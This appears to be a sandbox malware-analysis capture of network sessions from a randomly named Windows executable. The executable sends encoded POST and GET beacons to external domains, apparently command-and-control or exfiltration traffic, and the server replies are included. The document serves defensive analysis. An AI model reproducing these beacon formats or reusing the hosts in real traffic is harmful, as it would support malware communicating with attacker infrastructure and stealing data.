                                  Data Raw: 7a 6e 36 4c 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 46 33 74 6e 49 34 4c 6c 4a 47 55 69 39 4d 38 66 42 59 77 56 6e 66 59 74 6a 74 61 6b 43 37 57 72 70 70 78 36 4b 41 62 42 6f 55 4e 7a 77 4d 33 4c 34 35 4c 63 4f 31 76 6d 33 43 61 75 42 54 5a 61 77 54 58 79 31 4f 4e 57 62 6a 72 4a 44 49 34 30 46 61 77 38 51 45 45 6c 46 42 35 65 30 79 44 46 43 52 2b 65 44 54 79 61 42 32 59 41 78 46 74 33 78 66 36 6b 53 53 45 4d 33 48 42 50 59 39 4f 4e 75 71 76 36 2f 59 78 55 6e 69 4f 42 2f 4c 4a 34 43 54 56 54 63 73 4a 37 79 6f 69 73 44 50 78 51 7a 34 57 2b 56 69 63 6a 31 6b 39 69 6e 52 46 34 30 47 37 78 6a 66 4d 70 70 4d 48 47 74 41 31 66 68 7a 56 79 34 2f 76 51 49 36 71 77 57 74 71 35 43 5a 74 4b 53 68 69 30 63 6e 2f 33 48 59 44 61 77 57 6d 78 78 68 7a 6b 67 6d 64 4a 43 6f 6d 7a 43 52 53 4d 38 73 42 6e 6d 4e 67 52 4a 61 2f 50 51 73 69 41 35 2b 37 43 43 68 65 32 32 77 69 46 52 71 38 39 2b 48 4b 72 68 56 76 6f 65 69 37 34 32 55 38 [TRUNCATED]
                                  Data Ascii: zn6L=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9F3tnI4LlJGUi9M8fBYwVnfYtjtakC7Wrppx6KAbBoUNzwM3L45LcO1vm3CauBTZawTXy1ONWbjrJDI40Faw8QEElFB5e0yDFCR+eDTyaB2YAxFt3xf6kSSEM3HBPY9ONuqv6/YxUniOB/LJ4CTVTcsJ7yoisDPxQz4W+Vicj1k9inRF40G7xjfMppMHGtA1fhzVy4/vQI6qwWtq5CZtKShi0cn/3HYDawWmxxhzkgmdJComzCRSM8sBnmNgRJa/PQsiA5+7CChe22wiFRq89+HKrhVvoei742U8xwIJ3ZO2sNsgZdItcy4VHkk2oWaYeYWyCu2PRbDRxDNUOproytE+2SMJ3L0Vcv4jsN6skZBAu7smxwzkSoyeaaFrB0tIIdtUiKWW5864fHrqjbas86FZ5GEuLm/+V8DfnCVZB8IWrj+i4BBF8gCgo31iHlOdw2hP0GYZhddpV68UepjdJf6c0pnRiPDr1lD0o9xCON3u44wMdJB7t0EQsgVF5zH2/wzptCcoWlnK7k9Rg5eW3IluTmQpOCR248Q8N0EH05NckM4BOcoyr3UPfF5urowmy/oDPOeyBfI8+fdlTqyW9Rcu2s3pc0sW6077fdfsVJBLXdhfxvmfnOLlCCag1o6gc46gxKenWzeE5ObT6MW50DObwaUM8NFdGd0y01FrEwfR4rcSmncXqz2ebqlh4PDy7/eE6GZ9Y/TjFBl9X8VDtd729fUqMe8/eWRLOKhdYa3v68kVFw76h8LaQtgQjvbCm14C5Q5yZhtFwbq65dbEmH6WP8i/YCWm4gPBTZE9xl74DCC5hIms0w9SJBb5v9cJyidi0xl3hPETEz0cZYul9qNymVnZ2FOOnL9Q8bZ33kB68DQRBTFbDpc5ms9UEk7R96B/4Gi/7ia9FqSu05IW4zLPkoIAOWPEs80A3h6wsZNqx9TMNA6hQpYT+83aqlcgsZErJB [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.66390213.248.169.48805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:40.312082052 CEST435OUTGET /cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.techacademy.store
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Jul 17, 2024 19:00:40.776273012 CEST410INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Wed, 17 Jul 2024 17:00:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 270
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 6e 36 4c 3d 66 68 6b 55 71 2f 50 34 5a 78 4c 45 48 7a 64 38 46 30 45 57 4c 4a 63 64 4b 7a 38 69 75 59 4a 42 79 71 37 63 56 2f 4d 78 4c 62 4a 52 70 43 67 42 47 68 35 59 57 52 6c 69 31 4b 31 57 34 7a 47 6a 54 39 44 69 4b 53 6d 55 56 72 35 78 39 34 61 78 46 78 45 58 61 67 55 51 33 76 38 4c 62 75 53 58 75 48 33 76 53 2f 45 48 5a 70 55 59 5a 7a 67 66 49 45 4c 76 34 75 50 35 7a 47 4d 71 39 72 77 2f 4f 67 39 55 6b 75 49 3d 26 42 46 3d 41 50 36 50 4c 56 6f 48 2d 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.663903162.159.134.42805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:45.875765085 CEST703OUTPOST /qt04/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.goodneighbor.club
                                  Origin: http://www.goodneighbor.club
                                  Referer: http://www.goodneighbor.club/qt04/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 55 68 39 46 52 6a 35 52 6a 45 51 72 63 57 53 76 51 78 4d 45 71 62 65 52 6f 67 6d 4d 6b 37 55 34 6e 78 30 5a 4b 68 71 4f 38 75 4c 43 71 4a 54 43 58 42 4a 46 32 43 47 47 56 35 73 73 2f 36 43 74 37 6e 6f 32 35 4b 65 31 73 76 57 76 42 52 6d 41 67 4d 71 62 59 76 79 58 59 33 68 64 35 47 66 67 38 50 43 2f 61 2b 71 55 63 69 76 56 44 71 56 6a 45 51 59 75 79 69 74 51 70 73 70 39 34 70 54 47 54 4f 45 51 73 37 34 61 61 6d 52 6a 4a 36 6b 68 57 70 73 53 65 48 73 4b 38 37 41 37 53 74 79 2b 79 59 65 36 6d 73 53 41 41 32 4b 58 48 2b 62 52 6a 33 72 63 51 38 31 35 31 6a 58 42 42 32 39 66 4e 4a 52 59 38 68 51 62 64 68 5a 71
                                  Data Ascii: zn6L=Uh9FRj5RjEQrcWSvQxMEqbeRogmMk7U4nx0ZKhqO8uLCqJTCXBJF2CGGV5ss/6Ct7no25Ke1svWvBRmAgMqbYvyXY3hd5Gfg8PC/a+qUcivVDqVjEQYuyitQpsp94pTGTOEQs74aamRjJ6khWpsSeHsK87A7Sty+yYe6msSAA2KXH+bRj3rcQ8151jXBB29fNJRY8hQbdhZq


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.663904162.159.134.42805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:48.496813059 CEST727OUTPOST /qt04/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.goodneighbor.club
                                  Origin: http://www.goodneighbor.club
                                  Referer: http://www.goodneighbor.club/qt04/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 55 68 39 46 52 6a 35 52 6a 45 51 72 4f 6d 69 76 44 57 67 45 2f 4c 65 51 6b 41 6d 4d 75 62 55 30 6e 78 34 5a 4b 67 76 56 38 38 2f 43 71 6f 6a 43 55 41 4a 46 6d 53 47 47 4e 70 73 74 67 71 43 36 37 6e 6b 55 35 4c 79 31 73 73 71 76 42 56 69 41 67 37 47 59 5a 2f 79 56 41 48 68 66 33 6d 66 67 38 50 43 2f 61 2f 4f 75 63 6d 4c 56 44 61 46 6a 46 78 59 74 78 69 74 54 67 4d 70 39 38 70 54 43 54 4f 45 35 73 2f 77 6b 61 6b 5a 6a 4a 2f 41 68 58 38 59 56 55 48 73 51 79 62 42 59 56 49 72 6b 39 4c 58 6b 74 2b 32 6b 64 78 4b 78 50 6f 61 4c 2f 45 72 2f 43 73 56 37 31 68 50 7a 42 57 39 31 50 4a 70 59 75 32 63 38 53 56 38 4a 6a 58 6f 47 76 57 67 58 4c 64 70 44 33 47 48 76 4c 32 47 36 70 67 3d 3d
                                  Data Ascii: zn6L=Uh9FRj5RjEQrOmivDWgE/LeQkAmMubU0nx4ZKgvV88/CqojCUAJFmSGGNpstgqC67nkU5Ly1ssqvBViAg7GYZ/yVAHhf3mfg8PC/a/OucmLVDaFjFxYtxitTgMp98pTCTOE5s/wkakZjJ/AhX8YVUHsQybBYVIrk9LXkt+2kdxKxPoaL/Er/CsV71hPzBW91PJpYu2c8SV8JjXoGvWgXLdpD3GHvL2G6pg==
                                  Jul 17, 2024 19:00:49.814909935 CEST1236INHTTP/1.1 404 Not Found
                                  Date: Wed, 17 Jul 2024 17:00:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Ray: 8a4bca56190a5e79-EWR
                                  CF-Cache-Status: DYNAMIC
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Content-Encoding: gzip
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Link: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"
                                  Vary: Accept-Encoding
                                  ki-cache-type: None
                                  Ki-CF-Cache-Status: BYPASS
                                  ki-edge: v=20.2.7;mv=3.0.6
                                  ki-origin: g1p
                                  X-Content-Type-Options: nosniff
                                  X-Edge-Location-Klb: 1
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxlNXrqfOuB%2BawULHB9tMokoe6PzNKmsLm2S6B%2BPVr1WB8HB2pQrPV1X2eV6fMyXy1wmKpJjzH8ZEmF6NGa%2FMShZouBlSXZEv3oIXDD%2FR6ivoejc11vdZpSItyxsiyVZpfs7%2BQ14TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45
                                  Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E
                                  Jul 17, 2024 19:00:49.814934015 CEST1236INData Raw: b1 f1 3c 5c 8e 1e 1f 71 81 bb 1a cd 8d 38 1a 45 69 d2 50 14 37 66 ee 37 3b 98 01 4e 7b 11 fb d8 a2 5e e8 c6 53 bf 61 1c 41 c1 64 1c 07 8b f4 c9 55 30 f7 a2 2b 67 78 35 76 8d 81 a1 bf 7d ff 6e 7c fa dc 7f 7c 24 00 ff af bb 59 cb 1a de 3c 41 9c 13
                                  Data Ascii: <\q8EiP7f7;N{^SaAdU0+gx5v}n||$Y<A?_4yHiMCG3g[$uZ^K$)G%w&OYUAS?)t$,a0v IrmB}`{8,{v}4#"y4$;2:Q*XKO`>M@TVMqh
                                  Jul 17, 2024 19:00:49.814984083 CEST1236INData Raw: 18 0d 1c 6e 9a 87 13 27 8d de d3 94 db 6c 1d 9a 90 f0 a9 30 0b 27 2d 6b a9 c1 58 0b ed e5 b3 f3 25 0a e6 4d 90 40 28 0b 9d 64 c2 0c 88 2c c7 2a 9b 30 82 ac 15 d2 d0 33 71 64 1e 7d 71 a1 41 3c 3e d6 38 bc 11 90 59 d1 ac 68 4b 33 6e 59 2b 74 17 7a
                                  Data Ascii: n'l0'-kX%M@(d,*03qd}qA<>8YhK3nY+tz0<g2<|m2<nQA`A-nA^.DI3v+4A~+p0|A't\y=BpwO@BP_u-nW}u-REB[M
                                  Jul 17, 2024 19:00:49.816356897 CEST1236INData Raw: 96 08 65 f2 10 98 bf 23 86 f1 32 46 81 dd b5 eb 1d ae cc f7 60 84 0a de 1e 1f 1f f7 a3 85 3b 06 5b ac d7 d9 b7 56 c1 81 bd 2b 2f 8b 86 52 d4 93 c9 8e 44 78 d7 e0 48 06 e3 7d 89 10 c5 6e da 06 59 7c 97 b6 9c b6 1f 3e f0 4f fb 6a a4 e5 e6 a2 7d 5b
                                  Data Ascii: e#2F`;[V+/RDxH}nY|>Oj}[@Me9sa`]F^]$r\Ui))1hAAML~,>Y"S?OQ{p4<kyvfOyr>B\igmPc"ax